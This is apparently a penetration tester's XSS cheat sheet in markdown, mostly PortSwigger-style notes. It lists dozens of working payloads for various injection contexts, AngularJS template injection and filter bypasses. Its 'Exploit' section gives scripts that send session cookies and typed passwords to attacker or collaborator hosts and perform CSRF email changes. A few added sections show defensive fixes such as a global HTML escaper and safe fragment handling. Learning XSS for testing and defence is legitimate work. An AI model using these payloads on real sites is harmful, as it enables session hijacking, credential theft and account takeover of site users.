# XSS

{% hint style="info" %}
If you use Chrome: from version 92 onward (July 20th, 2021), cross-origin iframes are prevented from calling `alert()`.

Such cases can therefore also be solved using `print()`.
{% endhint %}

{% hint style="info" %}
PortSwigger cheatsheet:

<https://portswigger.net/web-security/cross-site-scripting/cheat-sheet>

JavaScript single-line comment: `// comment`

JavaScript multi-line comment: `/* comment */`
{% endhint %}

{% hint style="info" %}
Tiny XSS payload:

src: <https://nj.rs/>

example:

```html
<script/src=//Ǌ.₨></script>
<style/onload=import(/\Ǌ.₨/)>
```
{% endhint %}

## Context & Payload:

`<img ='><svg onload="alert(5)" '>`

```javascript
<iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'">
```

```javascript
<img src=x onerror=alert() >
<><img src=1 onerror=alert(1)>
```

```javascript
javascript:alert(document.domain)
```

```javascript
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x" /></svg>
```

```javascript
<script src="data:text/javascript,alert(1)"></script>
<script>alert("xss")</script>
<script>alert(1);</script>
<%00script>alert(1)</%00script>
SCRIPT>alert("XSS");///SCRIPT>
${alert(1)}
'-alert(document.domain)-'
';alert(document.domain);//
```

### In canonical link tag:

```
https://vulnerable_site.com/?'accesskey='x'onclick='alert(1)
```

{% hint style="info" %}
To exploit, press one of the following key combinations:

* On Windows: `ALT+SHIFT+X`
* On macOS: `CTRL+ALT+X`
* On Linux: `Alt+X`

Example canonical link:

```html
<link rel="canonical" href='SITE_URL'/>
```
{% endhint %}

### On HTML tag attributes:

```
" autofocus onfocus=alert(document.domain) x="
```

### On JavaScript variable:

{% tabs %}
{% tab title="JavaScript" %}

```javascript
</script><script>alert(document.domain);</script>
'-alert(document.domain)-'
';alert(document.domain);//
\';alert(document.domain)//
\'-alert(1)//
'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'

```

{% endtab %}
{% endtabs %}

## without () and ":

```
onerror=alert;throw 1                  // when () is blocked
?postId=5&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'
```

Reference: <https://portswigger.net/research/xss-without-parentheses-and-semi-colons>

## Reflected XSS:

## Stored XSS:

## Blind XSS:

### Payload:

```javascript
'"><svg/onload=fetch(`//YOUR-COLLABORATOR-PAYLOAD/${encodeURIComponent(document.cookie)}`)>

<img src=x onerror=import('https://Your-xss-site/xss.js');//>

```

## DOM-based XSS:

### Example payload:

```url
http://www.example.com/test.html#<script>alert(1)</script>
```

### Popular Sources:

* `document.URL`
* `document.documentURI`
* `document.referrer`
* `location.href`
* `location.search`
* `location.*`
* `location.hash`
* `window.name`
* `window.location`

### Popular Sinks:

* `document.write()`
* `document.writeln()`
* `document.domain`
* `element.innerHTML` (assigning to `innerText` or `textContent` instead inserts plain text and avoids this sink)
* `element.outerHTML`
* `element.insertAdjacentHTML`
* `element.onevent`
* `element.src` (in certain elements)
* `eval`
* `setTimeout`
* `setInterval`
* `execScript`

```bash
# -n prints line numbers; the dots are escaped so "document.URL" does not also match "documentXURL"
grep -rnE "document\.URL|document\.documentURI|document\.referrer|location\.href|location\.search|location\.hash|window\.name|window\.location" ./path/to/file
```

### jQuery sinks:

* `add()`
* `after()`
* `append()`
* `animate()`
* `insertAfter()`
* `insertBefore()`
* `before()`
* `html()`
* `prepend()`
* `replaceAll()`
* `replaceWith()`
* `wrap()`
* `wrapInner()`
* `wrapAll()`
* `has()`
* `constructor()`
* `init()`
* `index()`
* `jQuery.parseHTML()`
* `$.parseHTML()`
* `$()` selector sink, e.g. `$(window).on(.......`

## DOM XSS in AngularJS:

{% hint style="info" %}
If a framework like AngularJS is used, it may be possible to execute JavaScript without angle brackets or events. When a site uses the `ng-app` attribute on an HTML element, it will be processed by AngularJS. In this case, AngularJS will execute JavaScript inside double curly braces that can occur directly in HTML or inside attributes.

Source: PortSwigger
{% endhint %}

### How to Test:

1. Enter a random string into your controllable source.
2. View the page source and observe that your random string is enclosed in an `ng-app` directive.
3. Enter the following AngularJS expressions in the search box:

   ```javascript
   {{1 + 1}}
   {{$on.constructor('alert(1)')()}}
   {{$eval.constructor('alert()')()}}
   {{$watch.constructor('alert()')()}}
   {{constructor.constructor('alert(document.cookie)')()}}
   ```

## Example code and Payload:

```javascript
$(window).on('hashchange', function() {
	var element = $(location.hash);
	element[0].scrollIntoView();
});
```

```html
<iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'">
```
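A hardened version of the hashchange handler above, added here as an example rather than taken from the page: the fragment is validated as a plain element id and resolved with `getElementById`, so `location.hash` never reaches the `$()` selector sink. The names `resolveScrollTarget`, `scrollToFragment` and `makeFakeDocument` are assumptions made for this example.

```javascript
// Added example (not from the original page): replace `$(location.hash)` with
// strict validation of the fragment plus a lookup that never parses HTML.

const ID_PATTERN = /^[A-Za-z][\w-]*$/; // what a legitimate anchor id looks like

// Returns the element id carried by a URL fragment, or null when the fragment
// is empty, malformed, or contains anything other than id characters.
function resolveScrollTarget(hash) {
  if (typeof hash !== 'string' || !hash.startsWith('#')) return null;
  let id;
  try {
    id = decodeURIComponent(hash.slice(1)); // '#%3Cimg' decodes to '<img'
  } catch (e) {
    return null; // malformed percent-encoding
  }
  return ID_PATTERN.test(id) ? id : null;
}

// Safe replacement for the handler body. `doc` is injected so the logic can be
// exercised outside a browser; in the page it would simply be `document`.
function scrollToFragment(doc, hash) {
  const id = resolveScrollTarget(hash);
  if (id === null) return false;            // reject: nothing is scrolled or inserted
  const el = doc.getElementById(id);        // plain lookup, no selector parsing
  if (!el) return false;
  el.scrollIntoView();
  return true;
}

// Browser wiring (hypothetical; keeps the original handler's trigger):
//   window.addEventListener('hashchange', () => scrollToFragment(document, location.hash));

// Constructed stand-in for `document` that knows a fixed set of anchor ids.
function makeFakeDocument(ids) {
  const scrolled = [];
  return {
    scrolled,
    getElementById(id) {
      return ids.includes(id) ? { scrollIntoView() { scrolled.push(id); } } : null;
    },
  };
}
```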

```javascript
function search(path) {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
            // sink: the response (which reflects window.location.search) is passed to eval
            eval('var searchResultsObj = ' + this.responseText);
            displaySearchResults(searchResultsObj);
        }
    };
    xhr.open("GET", path + window.location.search);
    xhr.send();
}
```

```javascript
/?search=blah\"};alert();%20//
/?search=\"-prompt()}//
/?search=\"/alert()} //
```

```javascript
function escapeHTML(html) {
    return html.replace('<', '&lt;').replace('>', '&gt;');
}
// vulnerable: when the pattern is a string, replace() only replaces the first occurrence
```

```javascript
<><img src=1 onerror=alert(1)>
```
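The page's `escapeHTML` beside a hardened encoder, run against the `<><img ...>` bypass above. This is an added example, not code from the page; `escapeHTMLVulnerable`, `escapeHTMLSafe`, `containsRawTag` and `demo` are names chosen for it.

```javascript
// Added example (not from the original page): first-occurrence-only escaping
// versus a global, context-complete HTML encoder.

// Vulnerable (as on the page): a string pattern makes replace() act once, so
// the second '<' and '>' survive and the <img> tag reaches the HTML parser.
function escapeHTMLVulnerable(html) {
  return html.replace('<', '&lt;').replace('>', '&gt;');
}

// Hardened: a global regex over every HTML-significant character. '&' is
// included so already-encoded text cannot be double-decoded, and both quote
// styles so the output is also safe inside a quoted attribute value.
const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHTMLSafe(html) {
  return String(html).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// Test-harness check: does a raw tag opener survive encoding?
function containsRawTag(s) {
  return /<[a-zA-Z]/.test(s);
}

// Constructed input: the bypass payload listed on this page.
const PAYLOAD = '<><img src=1 onerror=alert(1)>';

function demo() {
  return {
    vulnerable: escapeHTMLVulnerable(PAYLOAD),
    safe: escapeHTMLSafe(PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```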

```html
<script>
 var searchTerms = 'SEARCH_TERM';     // the vulnerability is here: untrusted input lands inside a JS string
 document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
```

```
</script><script>alert(document.domain);</script>
'-alert(document.domain)-'
';alert(document.domain);//
```
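How the tracker snippet above would embed the search term safely in its JS-string context, checked against the three breakout payloads just listed. Added example, not the page's code; `jsStringLiteral`, `buildTrackerScript` and `isSafelyEmbedded` are names assumed for it.

```javascript
// Added example (not from the original page): encoding for a JavaScript
// string literal that itself sits inside an inline <script> block.

// JSON.stringify escapes quotes and backslashes, so the value cannot close the
// string literal; '<' and '>' are additionally written as \u003c / \u003e so a
// "</script>" inside the value cannot end the script block in the HTML parser.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, '\\u003c').replace(/>/g, '\\u003e');
}

// Builds the inline script shown on the page, with the value embedded safely.
function buildTrackerScript(searchTerm) {
  return '<script>\n' +
    ' var searchTerms = ' + jsStringLiteral(searchTerm) + ';\n' +
    " document.write('<img src=\"/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'\">');\n" +
    '</script>';
}

// Test-harness check: the emitted script must contain exactly one closing
// </script> (its own) and the literal must round-trip to the original value.
function isSafelyEmbedded(searchTerm) {
  const script = buildTrackerScript(searchTerm);
  const closes = (script.match(/<\/script/gi) || []).length;
  const roundTrip = JSON.parse(jsStringLiteral(searchTerm)) === String(searchTerm);
  return closes === 1 && roundTrip;
}

// Constructed inputs: the breakout payloads listed on this page.
const BREAKOUTS = [
  '</script><script>alert(document.domain);</script>',
  "'-alert(document.domain)-'",
  "';alert(document.domain);//",
];
```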

## Exploit:

### To steal cookies:

```javascript
<script>
fetch('https://attacker_controll_site.com', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

//to get csrf token:
document.getElementsByName('csrf')[0].value;
```

```javascript
<script>
window.addEventListener('DOMContentLoaded', function(){

var token = document.getElementsByName('csrf')[0].value;
var data = new FormData();

data.append('csrf', token);
data.append('postId', 8);
data.append('comment', document.cookie);
data.append('name', 'victim');
data.append('email', 'example@email.com');
data.append('website', 'https://www.example.com');

fetch('/post/comment', {
    method: 'POST',
    mode: 'no-cors',
    body: data
});

});
</script>
```

### To capture passwords:

```javascript
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
```

### To perform CSRF:

```javascript
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```

```javascript
<iframe src="https://vulnerable_site.net/?search=<body%20onresize=print()>" onload=this.style.width='100px'>
```

## Testing for Blind XSS:

* <https://bxsshunter.com/>
* <https://xss.report/dashboard>
